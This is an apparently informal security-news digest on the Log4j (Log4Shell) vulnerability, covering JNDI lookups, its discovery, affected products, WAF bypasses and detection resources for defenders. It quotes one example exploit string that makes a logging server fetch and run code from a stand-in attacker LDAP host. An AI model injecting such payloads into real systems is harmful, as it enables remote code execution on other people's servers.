CyberSecurity News -log4j week
December 12th
Log4j added JNDILookup plugin in 2013
It uses the URL ldap://localhost:389/o=JNDITutorial to find the JNDITutorial object from an LDAP server
Dec. 9, Chen Zhaojun of Alibaba Cloud Security Team discovered that the vulnerability was first used on Minecraft and thought to involve only the gaming platform but quick exploration revealed that the vulnerability potentially affects any software using this library
The log4j’s formatting language includes the ability to trigger code. So when a message containing the string ${jndi:ldap://attacker.com/pwnyourserver} is logged, Java will attempt to fetch the object referred to from the remote server, deserialize it and run the appropriate code
Since Apache log4j is used in countless applications, the vulnerability also makes those applications vulnerable:- e.g.
VCenter -https://www.vmware.com/security/advisories/VMSA-2021-0028.html
Apple Iphone -
AWS Secret Keys
This has had blue teams and SOCs all over the world working hard this weekend, either patching or adding WAF rules.
Added to this headache we have WAF bypasses that are constantly found: https://twitter.com/search?q=log4j%20waf%20bypass&src=typeahead_click&f=top
Crowdstrike, Splunk and Sumologic have released detection methods:
- https://www.crowdstrike.com/blog/log4j2-vulnerability-analysis-and-mitigation-recommendations/
- https://github.com/SumoLogic/sumo-log4j-appender
- https://www.splunk.com/en_us/blog/security/log-jammin-log4j-2-rce.html
This vulnerability’s CVE was published on Friday the 10th, it was exploited for a while before that.
Since social media is sharing exploitation payloads, (which happens with any exploit) and social media is constantly scraped for analytics and state monitoring, if the scraping tools use log4j they are accidentally exploited.
Rumble has published a list of vulnerable applications:
https://www.rumble.run/blog/finding-log4j/
@GossiTheDog has also published a list, this is uptodate and should be read by everyone